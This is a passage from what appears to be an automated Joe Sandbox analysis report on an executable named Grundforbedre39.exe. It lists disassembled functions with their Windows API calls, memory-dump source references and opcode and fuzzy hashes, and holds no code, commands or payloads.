                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 2547128583-0
                                                                                      • Opcode ID: a18958032a131606469e198625683324ecaa140be52d037ed0b096a6b0eca255
                                                                                      • Instruction ID: 5dc38b7c1614d08ea85e9237aecc352f838a6b2874e2c17184f6d3a6923fef4e
                                                                                      • Opcode Fuzzy Hash: a18958032a131606469e198625683324ecaa140be52d037ed0b096a6b0eca255
                                                                                      • Instruction Fuzzy Hash: 02E086326081225BD31157715D4497776A8AA9D640306043EFD06F61C1D774AC219AAD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401DDC Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$EnableShow
                                                                                      • String ID:
                                                                                      • API String ID: 1136574915-0
                                                                                      • Opcode ID: 347994a47e66675a56206e59af71a82015a20bd66eb05692f0dc3c3b28152ec7
                                                                                      • Instruction ID: c65acc83bfa495384d8d8e75d5cf87c092469090b0d1be5324bf36691b182b4f
                                                                                      • Opcode Fuzzy Hash: 347994a47e66675a56206e59af71a82015a20bd66eb05692f0dc3c3b28152ec7
                                                                                      • Instruction Fuzzy Hash: C1E08C32A04100ABC720AFB5AA8999D3375EF90369B10057BE402F10E1C6BCAC409A2E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405BEF Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Grundforbedre39.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00405BF3
                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00405C15
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCreate
                                                                                      • String ID:
                                                                                      • API String ID: 415043291-0
                                                                                      • Opcode ID: 742792ff7842fdd919adb4f35d156b5e8b6622b1384091bd21e9a064bfd9155a
                                                                                      • Instruction ID: be88a92cb82447fd1599dbd49a9896cb6db060ceaa3ec03b2970cb079924df1d
                                                                                      • Opcode Fuzzy Hash: 742792ff7842fdd919adb4f35d156b5e8b6622b1384091bd21e9a064bfd9155a
                                                                                      • Instruction Fuzzy Hash: FDD09E71658201AFEF098F20DE16F2E7AA2EB84B00F10562CB642940E0D6B15815DB16
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004056C5 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,0040325D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 004056CB
                                                                                      • GetLastError.KERNEL32 ref: 004056D9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1375471231-0
                                                                                      • Opcode ID: d8dd424ede50ccfac4b7523ad15fca3fe61b3a2743ebd4ec855a49df1000c641
                                                                                      • Instruction ID: fb2ec3850198e6a3c32e9ec6a0d6f7e4a8645a4513041e6eac74538e2b64e397
                                                                                      • Opcode Fuzzy Hash: d8dd424ede50ccfac4b7523ad15fca3fe61b3a2743ebd4ec855a49df1000c641
                                                                                      • Instruction Fuzzy Hash: 51C04C30A18642DBD6505B20ED087177950AB50741F60CD35610BF11A0D6759811DD3E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 100028A4 Relevance: 2.7, APIs: 2, Instructions: 156memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNELBASE(00000000), ref: 10002963
                                                                                      • GetLastError.KERNEL32 ref: 10002A6A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1146159756.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1146123851.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1146198520.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1146237766.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocErrorLastVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 497505419-0
                                                                                      • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                      • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                                                      • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                      • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401673 Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 0040168E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileMove
                                                                                      • String ID:
                                                                                      • API String ID: 3562171763-0
                                                                                      • Opcode ID: 2709739294a990dc73731c5d5ee29084b050ed7b5d4126b103810d59a933f9e4
                                                                                      • Instruction ID: 1b5114671cd2f37f61593a5948342403c0197a7a9993dea188d241478f0c7c7c
                                                                                      • Opcode Fuzzy Hash: 2709739294a990dc73731c5d5ee29084b050ed7b5d4126b103810d59a933f9e4
                                                                                      • Instruction Fuzzy Hash: 16F0963160511097CB107B754E0DD5F31659B82328B24467BB911B21E5D9BC8A01956E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402786 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0
                                                                                        • Part of subcall function 00405F61: wsprintfW.USER32 ref: 00405F6E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointerwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 327478801-0
                                                                                      • Opcode ID: 390f2af81ab463b3cbd4013dd9a57b5a130c00408a04b447ab1cf3b55cc0eeb8
                                                                                      • Instruction ID: 1be42fce3669e14aef02856632b8c3fd6eb27c701acbe6074d6f00ab1ddd0ca8
                                                                                      • Opcode Fuzzy Hash: 390f2af81ab463b3cbd4013dd9a57b5a130c00408a04b447ab1cf3b55cc0eeb8
                                                                                      • Instruction Fuzzy Hash: 30E04F71B05515EBDB11AFA59E4ADAF776AEB40329B14043BF101F00E1C67D8C419A3E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040229D Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileStringWrite
                                                                                      • String ID:
                                                                                      • API String ID: 390214022-0
                                                                                      • Opcode ID: 981c7979ba822dccdb72df52fcfe6b7f87be0c37e1a4f4794e53a06bb608896e
                                                                                      • Instruction ID: 149acb2e4c8d2ab334bf79ea3f96ce17df26442c265e53a7283cdf21b2f65ea8
                                                                                      • Opcode Fuzzy Hash: 981c7979ba822dccdb72df52fcfe6b7f87be0c37e1a4f4794e53a06bb608896e
                                                                                      • Instruction Fuzzy Hash: B3E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB511B66C6D5FC1D4146A9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040172D Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401741
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: PathSearch
                                                                                      • String ID:
                                                                                      • API String ID: 2203818243-0
                                                                                      • Opcode ID: eaacdd191c7eea98fc74c72ee0c8fabea13cd959233ea4d6937bd7f6f4107858
                                                                                      • Instruction ID: 3ece1a6015159183f920534ecfc8dbbbdcbcaab1af18821eb087b1273417be7a
                                                                                      • Opcode Fuzzy Hash: eaacdd191c7eea98fc74c72ee0c8fabea13cd959233ea4d6937bd7f6f4107858
                                                                                      • Instruction Fuzzy Hash: C1E08672304100EBD750CFA4DE49AAA77ACDF403B8F20457BF615E61D1E6B49A41973D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405C72 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000,000000FF,?,0040321F,00000000,00000000,00403076,000000FF,?,00000000,00000000,00000000), ref: 00405C86
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileRead
                                                                                      • String ID:
                                                                                      • API String ID: 2738559852-0
                                                                                      • Opcode ID: a00b84ef068ec3340bdddd9f42ca8c04165d68640cb73732be2406276cbef438
                                                                                      • Instruction ID: ef4ecac980915e2f81eec60b371ea7b66f7146230b2cbae24b16510ac7dd1765
                                                                                      • Opcode Fuzzy Hash: a00b84ef068ec3340bdddd9f42ca8c04165d68640cb73732be2406276cbef438
                                                                                      • Instruction Fuzzy Hash: 53E0EC3265835AABEF109E659C08AEB7B6CEB05360F004432F915E6190D271E8219BA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402CC9 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(00000000,00000696,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Open
                                                                                      • String ID:
                                                                                      • API String ID: 71445658-0
                                                                                      • Opcode ID: 47bb742b83de058295ea66ad7c8c51c1fc329d8dacee4bb1f88cf71d1c5c0238
                                                                                      • Instruction ID: 2fd216668262c1d23633d06d3759517c993b1d1f21998de780648112abb91376
                                                                                      • Opcode Fuzzy Hash: 47bb742b83de058295ea66ad7c8c51c1fc329d8dacee4bb1f88cf71d1c5c0238
                                                                                      • Instruction Fuzzy Hash: 64E08676244108BFDB00DFA4DD47FD577ECEB44700F004421BA08D7091C774E5408768
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405CA1 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WriteFile.KERNELBASE(00000000,00000000,?,?,00000000,?,?,004031ED,00000000,0040BEA0,?,0040BEA0,?,000000FF,?,00000000), ref: 00405CB5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3934441357-0
                                                                                      • Opcode ID: 00c0377323aa53eb430c82b83f01e62a2601c7c92c94a0140a128221a0f71a88
                                                                                      • Instruction ID: ba43a9b4bceeecaa6f2f3e0d34fbf098cac3b3b9582c4b6c2afca3054f4c0e18
                                                                                      • Opcode Fuzzy Hash: 00c0377323aa53eb430c82b83f01e62a2601c7c92c94a0140a128221a0f71a88
                                                                                      • Instruction Fuzzy Hash: 53E08632114319ABDF105E509C40EEB3B6CEB00350F004432F915E3180D231F8219BA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 100027C7 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualProtect.KERNELBASE(1000405C,?,?,1000404C), ref: 100027E5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1146159756.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1146123851.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1146198520.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1146237766.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                      • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                                                      • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                      • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004022DF Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402310
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
